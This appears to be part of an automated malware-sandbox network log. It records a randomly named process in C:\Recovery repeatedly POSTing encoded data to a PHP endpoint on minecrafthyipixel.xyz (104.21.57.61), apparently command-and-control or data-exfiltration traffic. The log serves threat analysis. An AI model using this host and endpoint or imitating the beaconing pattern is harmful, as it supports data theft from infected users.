                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RJktfo96U3ThBx3jI4IycIG8aKYvFRkHzR23XmvLc1TUT5dlfbtPHqP3mg6QA9Op73yC3QMo1OEcixHE3NRImvU6tKpFDjPXAiHA86wMBLx3pIt5rllh43bt38aPuz4VBQVwD6LBFR8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1e0ccc8b0eb-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:42:38.599802971 CEST  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
8           192.168.2.4  49752        104.21.57.61    80                6756  C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 13:42:38.868902922 CEST  362                OUT        POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
Apr 19, 2024 13:42:38.973742008 CEST  25                 IN         HTTP/1.1 100 Continue
Apr 19, 2024 13:42:38.974040985 CEST  2512               OUT        Data Raw: 57 5a 5b 58 59 46 54 54 5c 5e 59 59 57 50 58 59 54 56 5f 5e 54 5e 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ[XYFTT\^YYWPXYTV_^T^SW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&=2"$#''(1T?((%_$W%;5 "V>+'\ ,].%$[. X
Apr 19, 2024 13:42:39.323674917 CEST  619                IN         HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:39 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YzBmuAsWVwgCKUfuI6v7qPnpjMgSCMlSl0XLmJXJhiTrvGwtR2Ui1A2LC9cHDxnosaDq2u4Kl7%2Bo9jdXvXe56BnmPS0wGYZ4fpjhB8Cl4W0%2Bv18UqtObictqxj5btVCvCdbSXwS6B%2Fo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1e54fc94557-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:42:39.323707104 CEST  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
9           192.168.2.4  49754        104.21.57.61    80                6756  C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 13:42:39.549010038 CEST  386                OUT        POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:42:39.653772116 CEST  25                 IN         HTTP/1.1 100 Continue
Apr 19, 2024 13:42:39.654067039 CEST  2512               OUT        Data Raw: 52 58 5b 5c 5c 40 54 54 5c 5e 59 59 57 50 58 5c 54 51 5f 5c 54 5f 53 5e 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RX[\\@TT\^YYWPX\TQ_\T_S^^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&2-56?'0<0;2>1T%]*P#">8?[ ? /5$[. X


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
10          192.168.2.4  49755        104.21.57.61    80                6756  C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 13:42:39.810117006 CEST  386                OUT        POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2172
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:39.915143013 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:39.915489912 CEST | 2172 | OUT | Data Raw: 57 59 5e 5f 59 45 54 5b 5c 5e 59 59 57 51 58 5e 54 51 5f 5b 54 5b 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY^_YET[\^YYWQX^TQ_[T[SZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%]'>168?'03]$8-Q=(#&91;-426T)'] 0]:%$[. X =
                                                                                                                                    Apr 19, 2024 13:42:40.272536039 CEST | 768 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:40 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tNBuSHbdgx7h54CtgaE1CbGLPSXHCfrbSDmmDIGLsaf9einxrUFsq2Nkiu8xH87Uvrcbekr8rTUYGmJO38suUsrXk68Wv67ej%2BpbW8kBb%2Fn6P1xJ25RmHvnJI1Yia9khqGI6gvP%2Bcnk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1eb2fef4593-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 27 01 27 36 36 14 22 2a 20 04 3d 0d 2e 58 29 24 29 16 3d 39 2d 19 34 03 1d 0f 2f 3a 20 5c 2b 28 39 06 24 30 31 19 27 13 0a 1a 25 20 21 59 00 1a 39 58 22 2c 3d 1f 2c 29 0b 5a 2a 21 00 02 34 0b 3b 5a 2b 2e 2d 17 37 01 24 07 3c 00 3d 53 38 2b 30 18 3c 2b 21 15 3b 19 3a 16 36 3b 2c 52 09 12 26 0c 2a 2b 3b 07 31 1e 00 08 20 22 34 5d 3c 3c 31 05 30 28 30 57 24 33 06 5f 2d 0c 3a 1d 26 3e 0b 54 29 2a 2b 0c 37 3c 07 19 32 04 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98''66"* =.X)$)=9-4/: \+(9$01'% !Y9X",=,)Z*!4;Z+.-7$<=S8+0<+!;:6;,R&*+;1 "4]<<10(0W$3_-:&>T)*+7<2.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:42:40.272599936 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    11 | 192.168.2.4 | 49756 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:42:39.973391056 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:42:40.078299046 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:40.078471899 CEST | 2512 | OUT | Data Raw: 52 5e 5b 5b 5c 41 51 59 5c 5e 59 59 57 55 58 59 54 55 5f 5f 54 5f 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^[[\AQY\^YYWUXYTU__T_S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%]2=15;,Y0383])P*8 2<&= ".Q+(8#.5$[. X -
                                                                                                                                    Apr 19, 2024 13:42:40.414064884 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:40 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iTe3cjHntT8tfRxXtjSo4EKx8Z114z48k209XYIz2fSXJPeRhDm6NF%2F%2BQHywP4ssSBkwGzg41tSTK7W0vznzE2Wl1Uxlf59rm02A6CuycBx6mcB4a%2F5%2FMWFqjDYYNcp3Lsf7I75iwh4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1ec2a89b074-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:40.414129972 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    12 | 192.168.2.4 | 49757 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:42:40.642226934 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:42:40.746690035 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:40.746898890 CEST | 2512 | OUT | Data Raw: 57 59 5e 58 59 47 51 5e 5c 5e 59 59 57 52 58 5f 54 5b 5f 56 54 5c 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY^XYGQ^\^YYWRX_T[_VT\SW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&..5'?^$=;8&*'2.P!2")8;#/?95$[. X 1
                                                                                                                                    Apr 19, 2024 13:42:41.306287050 CEST | 623 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:41 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tIyLNdv0WX2hcSPbq0lY2GAQHcm6cDvGJYWxdl45fpMN8oWdrInNRfEatTVPFyd4%2FmAnHF4yZtS39IiHb37%2Bdpnib5gMEWUXIh1oGa0CPvEmv%2Birde%2F8%2FJ7mafASSUE48JHI46eTlzA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1f05d8b44e8-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:41.306350946 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    13 | 192.168.2.4 | 49758 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:42:41.532748938 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:41.637448072 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:41.637764931 CEST | 2512 | OUT | Data Raw: 57 5d 5e 58 5c 40 51 5e 5c 5e 59 59 57 51 58 52 54 52 5f 5f 54 55 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W]^X\@Q^\^YYWQXRTR__TUSW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%>5";7$#;$]>*8_%_<1! !>U++;^78:5$[. X =
                                                                                                                                    Apr 19, 2024 13:42:42.052294016 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:42 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TNT5ghCjfWnYFyZrOPtQPoL7lu3bMEi4TajZah0T5KvAJaQKAq0PlhL9kdscxCF5ULX4AP4M7asoslDDyRT05lZova6rEZJF2sRt%2BUHtrSt93%2FhCP5%2FoPS9ruYsCfw42CZ5N9gbC264%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1f5ef796783-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:42.052354097 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    14 | 192.168.2.4 | 49761 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:42:42.281712055 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:42.386126041 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:42.386305094 CEST | 2512 | OUT | Data Raw: 52 5a 5e 59 59 40 51 59 5c 5e 59 59 57 53 58 53 54 54 5f 5c 54 59 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ^YY@QY\^YYWSXSTT_\TYS[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%]1>6! Z$V'08-)#^&/1(> ->8$"/ _/%$[. X 5
                                                                                                                                    Apr 19, 2024 13:42:42.751432896 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:42 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wPu8zv8m95DpeHWUEED%2FFewSZxkrNMLPYGX%2BA5yCKKPIO2Jtjh%2Bys1mzANaLMytxPrnejmwpu6q6diB5Gfpr0o2EhqIZTLRJM4f8faNXiOaHQMQyVv0yLCi7Jclcm5waFtzWTQnBmBI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1fa998044d5-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:42.751496077 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    15 | 192.168.2.4 | 49762 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:42:42.983623981 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:43.087999105 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:43.088346004 CEST | 2512 | OUT | Data Raw: 57 55 5e 55 59 40 54 58 5c 5e 59 59 57 54 58 5c 54 50 5f 5f 54 5b 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WU^UY@TX\^YYWTX\TP__T[SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%2268$&38$%=8;%%82#2)*; #/,_.$[. X )
                                                                                                                                    Apr 19, 2024 13:42:43.444557905 CEST | 627 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:43 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D25yv%2FPJkIzZOT7N%2BXw%2FWvFZRY159wJ6zF7QphLUI24U9Ye7pl66v%2BdFHzbT4hE%2B87Bre8Go1YbQnimKzn9%2BJDBtzatLTNe3W8sw2tBAwh1DsOHPJ1j%2FMxnRL6JsGpzkAVXTuwC1k0Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1fef99c69ed-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:42:43.444622040 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49763 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:42:43.673417091 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:42:43.777977943 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:43.778137922 CEST2512OUTData Raw: 52 5d 5e 5b 5c 44 51 5e 5c 5e 59 59 57 53 58 58 54 5a 5f 5a 54 59 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R]^[\DQ^\^YYWSXXTZ_ZTYSZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%]2>"<'\'85>;(%93&+&7.U*\ 095$[. X 5
Apr 19, 2024 13:42:44.129538059 CEST | 617 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:44 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x20Wwpmov6Gf5LxbVz%2Bmrf2f1QwLtVTVlRGAXTV0Jh7BkqdXmUB0YvepVCtH7JnTr7LoFMQa8hZprhwrQjC0db8kJmywoUemcsAet14v9ky6tutPV%2B48Vp9NMihZ8Ey2EiDrpri2vrg%3D"}],"group":"cf-nel","max_age":604800}
